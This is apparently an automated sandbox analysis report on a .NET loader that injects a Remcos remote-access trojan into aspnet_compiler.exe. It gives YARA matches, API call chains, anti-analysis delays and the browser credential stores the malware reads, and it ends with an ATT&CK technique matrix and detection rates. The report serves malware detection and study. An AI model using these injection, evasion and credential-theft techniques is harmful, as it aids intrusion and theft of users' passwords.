              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0043307B appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00402073 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433700 appears 54 times
              Source: file.exeStatic PE information: No import functions for PE file found
              Source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exe, 00000000.00000002.566970526.00000177E991C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000000.00000002.566934362.00000177E9842000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNBNNhH873.exe4 vs file.exe
              Source: file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenameNBNNhH873.exe4 vs file.exe
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeReversingLabs: Detection: 35%
              Source: file.exeVirustotal: Detection: 46%
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00416840 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00416840
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/2@1/5
              Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E991 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,4_2_0040E991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UQ90W9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041A003 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041A003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: CEMENT.pdb source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBNNhH873.pdb source: file.exe

              Data Obfuscation

              Source: file.exe, JLcALfheHFNKcZnPLt/EP1EGhU66g5S5M02Ye.cs.Net Code: Ref8At7ZI System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: file.exe, rU0ptD4llTJ1hV0R3g/X0fs42yqQa7Qy1FGHk.cs.Net Code: X0fs42yqQa7Qy1FGHk.rA1j5nF0vJo1tmjB8Xu(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), X0fs42yqQa7Qy1FGHk.rA1j5nF0vJo1tmjB8Xu(typeof(Type).TypeHandle) })
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000177E97B2C75 push FFFFFFBAh; iretd 0_2_00000177E97B2C7C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00456328 push eax; ret 4_2_00456346
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0045C51D push esi; ret 4_2_0045C526
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433746 push ecx; ret 4_2_00433759
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00455A06 push ecx; ret 4_2_00455A19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: file.exeStatic PE information: 0xEACDEA53 [Sun Oct 31 11:36:51 2094 UTC]
              Source: initial sampleStatic PE information: section name: .text entropy: 7.511239938683684
              Source: file.exe, c2VdCkcfuulLVd3JSVN/dMdjZgcZKPfS5AC2lDf.csHigh entropy of concatenated method names: 'WcocIY8WWi', 'KHTcmWEX8l', 'ReIcHq3C21', 'rtAc6rInaP', 'SCxcOUCgho', 'HRxcCvZRpO', 'Ce4cNESpOo', '.ctor', '.cctor', 'B49EjuYwa6e1tR1hSn7'
              Source: file.exe, rU0ptD4llTJ1hV0R3g/X0fs42yqQa7Qy1FGHk.csHigh entropy of concatenated method names: '.cctor', 'X1reT73iit', 'Au7kmKk34', 'grrJKvsrg', 'RLK0bfYJn', 'MrGifVCYO', 'y84SWi6la', 'xJLo4XVgE', 'AlD1yfQTm', '.ctor'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406524 ShellExecuteW,URLDownloadToFileW,4_2_00406524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040ECEA Sleep,ExitProcess,4_2_0040ECEA
              Source: C:\Users\user\Desktop\file.exe TID: 5464Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 944Thread sleep count: 176 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 944Thread sleep time: -88000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_004192A3
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0044D0F9 FindFirstFileExA,4_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406EB0 FindFirstFileW,FindNextFileW,4_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_0040730B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_4-48098
              Source: file.exe, 00000000.00000002.564591902.00000177920B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HgfsSa/7Mz4
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bl%HgfsSa/7Mz4AIvfRNmLk/Cs/YU5W
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bVHgfsSa/7Mz4AIvfRNmLk/Cs/YU5W
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bl%HgfsSa/7Mz4
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %bVHgfsSa/7Mz4AIvfRNmLk/Cs/YU5WBLrwdvF/nOMbOXnxggMpO2I4rdwEEEPuX43KdCEpLr8hfjnvbzKgncgEFnjBxtlFg4TfjKuZ4Cr/qhLBl/Kscx8p3EhZQxAe2rApE/tcOjHfPhRncUf4Rk3/wAyaUcppDB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_0041B4C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00411241 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411241
              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00441B85 mov eax, dword ptr fs:[00000030h]4_2_00441B85
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433452 SetUnhandledExceptionFilter,4_2_00433452
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043A3F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043A3F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004338CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004338CC

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 477000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47C000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B04008
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_0041163A
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418186 mouse_event,4_2_00418186
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000F32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerW9\
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_0044716D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00450558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_004507D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_0045081B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_004508B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00450943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_00450B93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_00446C84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00450CBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_00450DC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,4_2_0040EE14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00450E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043354D cpuid 4_2_0043354D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00404F31 GetLocalTime,CreateEventA,CreateThread,4_2_00404F31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00447A10 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_00447A10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041A168 GetUserNameW,4_2_0041A168

              Stealing of Sensitive Information

              Source: Yara match File source: file.exe, type: SAMPLE
              Source: Yara match File source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \key3.db 4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 4_2_0040AF8C

              Remote Access Functionality

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: cmd.exe 4_2_0040567A
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts1
              Native API
              1
              Windows Service
              1
              Bypass User Access Control
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium12
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol11
              Input Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Service Execution
              Logon Script (Windows)1
              Windows Service
              3
              Obfuscated Files or Information
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares12
              Clipboard Data
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)322
              Process Injection
              22
              Software Packing
              NTDS2
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets33
              System Information Discovery
              SSHKeyloggingData Transfer Size Limits12
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Bypass User Access Control
              Cached Domain Credentials21
              Security Software Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Masquerading
              DCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
              Virtualization/Sandbox Evasion
              Proc Filesystem3
              Process Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)322
              Process Injection
              Network Sniffing1
              Remote System Discovery
              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Source | Detection | Scanner | Label | Link
              file.exe | 35% | ReversingLabs | Win64.Trojan.Cerbu | -
              file.exe | 46% | Virustotal | - | Browse
              file.exe | 100% | Joe Sandbox ML | - | -
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              geoplugin.net | 1% | Virustotal | - | Browse
              Source | Detection | Scanner | Label | Link
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe | -
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe | -
              http://geoplugin.net/json.gples8 | 0% | Avira URL Cloud | safe | -
